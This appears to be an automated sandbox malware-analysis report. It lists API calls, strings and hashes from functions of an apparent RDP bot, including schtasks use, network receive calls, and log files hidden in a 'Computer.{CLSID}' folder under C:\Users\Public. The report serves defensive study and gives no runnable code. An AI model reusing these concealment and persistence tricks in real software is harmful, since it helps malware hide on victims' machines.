strlen.MSVCRT ref: 00007FFE0EB49651
strlen.MSVCRT ref: 00007FFE0EB49660
strlen.MSVCRT ref: 00007FFE0EB49675

Strings

schtasks, xrefs: 00007FFE0EB495DF
*, xrefs: 00007FFE0EB49656

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: strlen$strcpy
String ID: *$schtasks
API String ID: 2790333442-2394224502
Opcode ID: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
Instruction ID: 2afa21938add3fb70f621cd6096b6cea3342bc80b378d6b85b2ced1f7d4c0995
Opcode Fuzzy Hash: 97730eb745bebb1e3a148d9c91100f2450272e3023c51ea8c0950519d129150e
Instruction Fuzzy Hash: 4F5183A2A0CB8385F771AE55E4513BA5691EBC5384F980035EACE473F6DE7CE9058F10

Function 00007FFE1338378B Relevance: 16.6, APIs: 7, Strings: 4, Instructions: 104memorysleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13382ECA: recv.WS2_32 ref: 00007FFE13382EF2

Sleep.KERNEL32 ref: 00007FFE133837E3

Part of subcall function 00007FFE13382072: fwrite.MSVCRT ref: 00007FFE1338211E
Part of subcall function 00007FFE13382072: fflush.MSVCRT ref: 00007FFE1338212A

LeaveCriticalSection.KERNEL32 ref: 00007FFE13383828
memcpy.MSVCRT ref: 00007FFE13383844
GetProcessHeap.KERNEL32 ref: 00007FFE13383866
HeapAlloc.KERNEL32 ref: 00007FFE13383877
memcpy.MSVCRT ref: 00007FFE13383898
EnterCriticalSection.KERNEL32 ref: 00007FFE133838F0

Strings

[E] (%s) -> Memory allocation failed(size=%llu), xrefs: 00007FFE13383805
mem_alloc, xrefs: 00007FFE133837FE
[D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s)), xrefs: 00007FFE133838DD
routine_rx, xrefs: 00007FFE133838D6

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: CriticalHeapSectionmemcpy$AllocEnterLeaveProcessSleepfflushfwriterecv
String ID: [D] (%s) -> Got an event(size=%u,code=%08x(%.4s),sender=%016llx(%.8s),receiver=%016llx(%.8s))$[E] (%s) -> Memory allocation failed(size=%llu)$mem_alloc$routine_rx
API String ID: 3537583691-1494920791
Opcode ID: f5fe8b67ae239f4394970cf3ed24f4d58279fb7353ba1ab73c9d33bbdb2da9c9
Instruction ID: 8b33125fe05e082d787c1984e0ce112b3cba66588694dddcca8196f5e357ea21
Opcode Fuzzy Hash: f5fe8b67ae239f4394970cf3ed24f4d58279fb7353ba1ab73c9d33bbdb2da9c9
Instruction Fuzzy Hash: 1141B165A09E0299EA108F12E84037E27A1FB64BB4F5446B5E92D67BB4DF3CE585C308

Function 00007FFE0E1340D2 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE0E13417E
fflush.MSVCRT ref: 00007FFE0E13418A
EnterCriticalSection.KERNEL32 ref: 00007FFE0E1341A3
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E1341CB
CopyFileA.KERNEL32 ref: 00007FFE0E134228

Strings

., xrefs: 00007FFE0E13420D
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log, xrefs: 00007FFE0E1341EB
1, xrefs: 00007FFE0E134212
:, xrefs: 00007FFE0E13415A, 00007FFE0E1341A9, 00007FFE0E1341B6

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$:$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.log
API String ID: 513531256-1867875793
Opcode ID: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
Instruction ID: f139f6e78592a36614b306c4834eee6994eefef2fe794ec39fc18c70afaec81f
Opcode Fuzzy Hash: 0865605239ea0c2a81fc5edc76914eb3e91c8f90c759d8de733d668bac4a86af
Instruction Fuzzy Hash: AE414CB5A0C74686F720AB21F8553AA72A1EB94790F440036EACD57BB6CF3CE5858741

Function 00007FFE0E16C852 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FFE0E16C8FE
fflush.MSVCRT ref: 00007FFE0E16C90A
EnterCriticalSection.KERNEL32 ref: 00007FFE0E16C923
LeaveCriticalSection.KERNEL32 ref: 00007FFE0E16C94B
CopyFileA.KERNEL32 ref: 00007FFE0E16C9A8

Strings

C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log, xrefs: 00007FFE0E16C96B
kernel32, xrefs: 00007FFE0E16C854, 00007FFE0E16C855
1, xrefs: 00007FFE0E16C992
., xrefs: 00007FFE0E16C98D

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.log$kernel32
API String ID: 513531256-1037688549
Opcode ID: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
Instruction ID: 928e3ad3256a7e5c3d542f1af26f378823af203553ce9fec49b5a7fdf1b48f3e
Opcode Fuzzy Hash: 746c250213a6bf0929b2031500baeb5bc966a1baef0d33071a41361a17e77abe
Instruction Fuzzy Hash: 6B417361A0C68686F3209B15E9503BA6361FF88B84F540137DACD87BB6DF3CE685C780

Function 00007FF6EF652EF2 Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 91fileCOMMON

Download Yara Rule

APIs

fwrite.MSVCRT ref: 00007FF6EF652F9E
fflush.MSVCRT ref: 00007FF6EF652FAA
EnterCriticalSection.KERNEL32(service,000001FC7A4F13D0,?,00007FF6EF668500,00007FF6EF652027,?,?,?,?,?,?,00007FF6EF65162F), ref: 00007FF6EF652FC3
LeaveCriticalSection.KERNEL32(?,00007FF6EF668500,00007FF6EF652027,?,?,?,?,?,?,00007FF6EF65162F), ref: 00007FF6EF652FEB
CopyFileA.KERNEL32 ref: 00007FF6EF653048

Strings

1, xrefs: 00007FF6EF653032
., xrefs: 00007FF6EF65302D
service, xrefs: 00007FF6EF652EF5
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log, xrefs: 00007FF6EF65300B

Memory Dump Source

Source File: 00000017.00000002.2979442400.00007FF6EF651000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6EF650000, based on PE: true

Associated: 00000017.00000002.2979419222.00007FF6EF650000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979465592.00007FF6EF660000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF668000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979493170.00007FF6EF66A000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000017.00000002.2979544533.00007FF6EF66E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ff6ef650000_main.jbxd

Similarity

API ID: CriticalSection$CopyEnterFileLeavefflushfwrite
String ID: .$1$C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$service
API String ID: 513531256-4171087551
Opcode ID: cb16032770b0f91297386cbf193347fe0b5cb319d835ba3c30b3a51f3a6e6d65
Instruction ID: a4d8f3627eaffa6bcff5f351584542592a90f8b1f0dec8da3a2c6207fade5caf
Opcode Fuzzy Hash: cb16032770b0f91297386cbf193347fe0b5cb319d835ba3c30b3a51f3a6e6d65
Instruction Fuzzy Hash: 3241C033A1C64287F7209B65E8513BA6358FF94780F440431EA0DE3796CF3EE681A74A

Function 00007FFE126D8480 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 70stringCOMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE126D851E
strtol.MSVCRT ref: 00007FFE126D8534
_errno.MSVCRT ref: 00007FFE126D853C
_errno.MSVCRT ref: 00007FFE126D8544

Strings

(value != NULL), xrefs: 00007FFE126D84F6
[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE126D856C
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE126D84EF
ini_get_uint16, xrefs: 00007FFE126D84FD, 00007FFE126D8565
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126D8504

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: _errno$strtol
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> strtol failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint16
API String ID: 3596500743-1991603811
Opcode ID: 5fa133a0e2a216fde6512bfdf3a05fbf46f16c42755a9a9a46345d0d237b952d
Instruction ID: c35f397888689a2814b4d4f7e9248b7be6e3c9e14def01476265f2834f7717ad
Opcode Fuzzy Hash: 5fa133a0e2a216fde6512bfdf3a05fbf46f16c42755a9a9a46345d0d237b952d
Instruction Fuzzy Hash: BE217121A08A4B92E752DF12ED40BAA7360BB847A4F444171EE8C477F5DFBDE846C700

Function 00007FFE13381D84 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE13381E20
_strtoui64.MSVCRT ref: 00007FFE13381E36
_errno.MSVCRT ref: 00007FFE13381E40
_errno.MSVCRT ref: 00007FFE13381E4C

Strings

ini_get_uint64, xrefs: 00007FFE13381DFF, 00007FFE13381E6C
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE13381E73
(value != NULL), xrefs: 00007FFE13381DF8
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE13381DF1
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE13381E06

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: e13d46a93c286f878066485ecde981a33247f1e20d45bf4f8e92133a70466138
Instruction ID: b5f19679a71c28bd62d9fa74d07e92517183936496122502cac29208d4e597b7
Opcode Fuzzy Hash: e13d46a93c286f878066485ecde981a33247f1e20d45bf4f8e92133a70466138
Instruction Fuzzy Hash: CC21A521A08E43CDE6508F16F8407AA7365BB647A8F4441B2EE5E57B74CF3CE989C704

Function 00007FFE0E1351C4 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE0E135260
_strtoui64.MSVCRT ref: 00007FFE0E135276
_errno.MSVCRT ref: 00007FFE0E135280
_errno.MSVCRT ref: 00007FFE0E13528C

Strings

ini_get_uint64, xrefs: 00007FFE0E13523F, 00007FFE0E1352AC
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E135231
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE0E1352B3
(value != NULL), xrefs: 00007FFE0E135238
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E135246

Memory Dump Source

Source File: 00000017.00000002.2982226441.00007FFE0E131000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFE0E130000, based on PE: true

Associated: 00000017.00000002.2980991323.00007FFE0E130000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982261410.00007FFE0E144000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982288459.00007FFE0E14D000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982320211.00007FFE0E150000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000017.00000002.2982349397.00007FFE0E151000.00000008.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e130000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: f75d34ed516198f01ab056ec250f59175d23025d401488cd657c0209166de838
Instruction ID: 8911999234356946425fb8b6d4dc17ed17ddc8704f79ecd673dbe6932265f3c2
Opcode Fuzzy Hash: f75d34ed516198f01ab056ec250f59175d23025d401488cd657c0209166de838
Instruction Fuzzy Hash: FA216862A08A8686E2619F65F8407AA3362FB44B88F444137EECC47764DF3CE989C700

Function 00007FFE126D8774 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE126D8810
_strtoui64.MSVCRT ref: 00007FFE126D8826
_errno.MSVCRT ref: 00007FFE126D8830
_errno.MSVCRT ref: 00007FFE126D883C

Strings

(value != NULL), xrefs: 00007FFE126D87E8
ini_get_uint64, xrefs: 00007FFE126D87EF, 00007FFE126D885C
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE126D87E1
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE126D8863
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE126D87F6

Memory Dump Source

Source File: 00000017.00000002.2983236501.00007FFE126D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE126D0000, based on PE: true

Associated: 00000017.00000002.2983191896.00007FFE126D0000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983276516.00007FFE126E3000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983306621.00007FFE126E4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983340803.00007FFE126ED000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983376197.00007FFE126F0000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983406046.00007FFE126F1000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000017.00000002.2983443586.00007FFE126F4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe126d0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: b1aee9f97c9f1de0cce9060c28bf6999ed44af3186cd3ea7dc81b6eb11d245c2
Instruction ID: c62d4453c216466d799934f18819c5bfa8fbbbd7cdbfa9780121892cc70923c1
Opcode Fuzzy Hash: b1aee9f97c9f1de0cce9060c28bf6999ed44af3186cd3ea7dc81b6eb11d245c2
Instruction Fuzzy Hash: 95218021A08E4A96E7569F16FC407AA73A0FB847A4F544072EE8D476F4DFBCE946C700

Function 00007FFE11EC2324 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE11EC23C0
_strtoui64.MSVCRT ref: 00007FFE11EC23D6
_errno.MSVCRT ref: 00007FFE11EC23E0
_errno.MSVCRT ref: 00007FFE11EC23EC

Strings

[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE11EC2413
(value != NULL), xrefs: 00007FFE11EC2398
ini_get_uint64, xrefs: 00007FFE11EC239F, 00007FFE11EC240C
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE11EC2391
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE11EC23A6

Memory Dump Source

Source File: 00000017.00000002.2982869443.00007FFE11EC1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFE11EC0000, based on PE: true

Associated: 00000017.00000002.2982773680.00007FFE11EC0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2982917287.00007FFE11ED2000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983003921.00007FFE11EDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983076043.00007FFE11EDE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983101282.00007FFE11EDF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000017.00000002.2983157453.00007FFE11EE2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe11ec0000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: f0151673459d954fc5dcff731ee88424ac42232836fb278fb00586788237db9e
Instruction ID: e811b6a7a4f8db158d4166d2aca6633958d7d47f7bb0ec7fa6ae695200235764
Opcode Fuzzy Hash: f0151673459d954fc5dcff731ee88424ac42232836fb278fb00586788237db9e
Instruction Fuzzy Hash: FC216D21608E4395EB519FAAFC407AB23A9BB457A8F844072EE4C47774DF3CE985C700

Function 00007FFE0E16D824 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE0E16D8C0
_strtoui64.MSVCRT ref: 00007FFE0E16D8D6
_errno.MSVCRT ref: 00007FFE0E16D8E0
_errno.MSVCRT ref: 00007FFE0E16D8EC

Strings

(value != NULL), xrefs: 00007FFE0E16D898
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0E16D8A6
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE0E16D913
ini_get_uint64, xrefs: 00007FFE0E16D89F, 00007FFE0E16D90C
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0E16D891

Memory Dump Source

Source File: 00000017.00000002.2982412926.00007FFE0E161000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFE0E160000, based on PE: true

Associated: 00000017.00000002.2982385098.00007FFE0E160000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982444726.00007FFE0E176000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982471694.00007FFE0E180000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982500156.00007FFE0E183000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000017.00000002.2982529491.00007FFE0E184000.00000008.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0e160000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: fa2a4e27047f47fddf336384d84b89814b392c4204742b02eeeaeb802e8f0b0f
Instruction ID: 070b834b722de0666c3ecd88461cfd6e7306df144cec89976a725ee1fe67d144
Opcode Fuzzy Hash: fa2a4e27047f47fddf336384d84b89814b392c4204742b02eeeaeb802e8f0b0f
Instruction Fuzzy Hash: 82218B62A08A4795E661AF15FC447AA73A4BB88B84F444137EECC47775DF3CE885C740

Function 00007FFE0EB4AD94 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 68COMMON

Download Yara Rule

APIs

_errno.MSVCRT ref: 00007FFE0EB4AE30
_strtoui64.MSVCRT ref: 00007FFE0EB4AE46
_errno.MSVCRT ref: 00007FFE0EB4AE50
_errno.MSVCRT ref: 00007FFE0EB4AE5C

Strings

(value != NULL), xrefs: 00007FFE0EB4AE08
ini_get_uint64, xrefs: 00007FFE0EB4AE0F, 00007FFE0EB4AE7C
[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d), xrefs: 00007FFE0EB4AE83
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE0EB4AE16
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE0EB4AE01

Memory Dump Source

Source File: 00000017.00000002.2982612085.00007FFE0EB41000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFE0EB40000, based on PE: true

Associated: 00000017.00000002.2982583990.00007FFE0EB40000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982645078.00007FFE0EB53000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982679325.00007FFE0EB5C000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982718497.00007FFE0EB5F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000017.00000002.2982747189.00007FFE0EB60000.00000008.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe0eb40000_main.jbxd

Similarity

API ID: _errno$_strtoui64
String ID: (value != NULL)$C:/Projects/rdp/bot/codebase/ini.c$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> _strtoi64 failed(sec_name=%s,var_name=%s,radix=%d,s=%s,errno=%d)$ini_get_uint64
API String ID: 3513630032-2210897324
Opcode ID: 07b2089ee97cb13c1d755c90fbf921b0eceee61a6633eae07e5fa0cfb09a47f8
Instruction ID: a38f0620dee4862648a1dd4eaf3c6c88d54c0c0891a8728ac0d746980dda0885
Opcode Fuzzy Hash: 07b2089ee97cb13c1d755c90fbf921b0eceee61a6633eae07e5fa0cfb09a47f8
Instruction Fuzzy Hash: 1B213D62B09B4796E6319F15F8407AA67A4FB48784F444136EE8D47774EF3CE985CB00

Function 00007FFE13381860 Relevance: 15.1, APIs: 1, Strings: 9, Instructions: 97stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 00007FFE1338194C

Strings

[W] (%s) -> Failed(sec=%s,name=%s,err=%08x), xrefs: 00007FFE133819C5
NULL, xrefs: 00007FFE133819DE, 00007FFE133819E7
ini_get_var, xrefs: 00007FFE133818A9, 00007FFE133818DC, 00007FFE1338190F, 00007FFE13381976, 00007FFE133819BE
[D] (%s) -> Done(sec=%s,name=%s,value=%s), xrefs: 00007FFE1338197D
(var != NULL), xrefs: 00007FFE13381908
(sec != NULL), xrefs: 00007FFE133818A2
C:/Projects/rdp/bot/codebase/ini.c, xrefs: 00007FFE1338189B, 00007FFE133818CE, 00007FFE13381901
[E] (%s) -> Assertation failed: %s, file %s, line %d, xrefs: 00007FFE133818B0, 00007FFE133818E3, 00007FFE13381916
(name != NULL), xrefs: 00007FFE133818D5

Memory Dump Source

Source File: 00000017.00000002.2983500227.00007FFE13381000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFE13380000, based on PE: true

Associated: 00000017.00000002.2983478738.00007FFE13380000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983526612.00007FFE13390000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983553402.00007FFE13398000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983584457.00007FFE1339B000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000017.00000002.2983614495.00007FFE1339C000.00000008.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_23_2_7ffe13380000_main.jbxd

Similarity

API ID: strcmp
String ID: (name != NULL)$(sec != NULL)$(var != NULL)$C:/Projects/rdp/bot/codebase/ini.c$NULL$[D] (%s) -> Done(sec=%s,name=%s,value=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[W] (%s) -> Failed(sec=%s,name=%s,err=%08x)$ini_get_var
API String ID: 1004003707-3780280517
Opcode ID: 4b024a6b28ce2b07e7a2910d768eb0d7eedf76f45639da4cab46353fdb6778d0
Instruction ID: c093707266c497001855f458bfbddb574c281cad5834fcce0d0e358e286bd96f
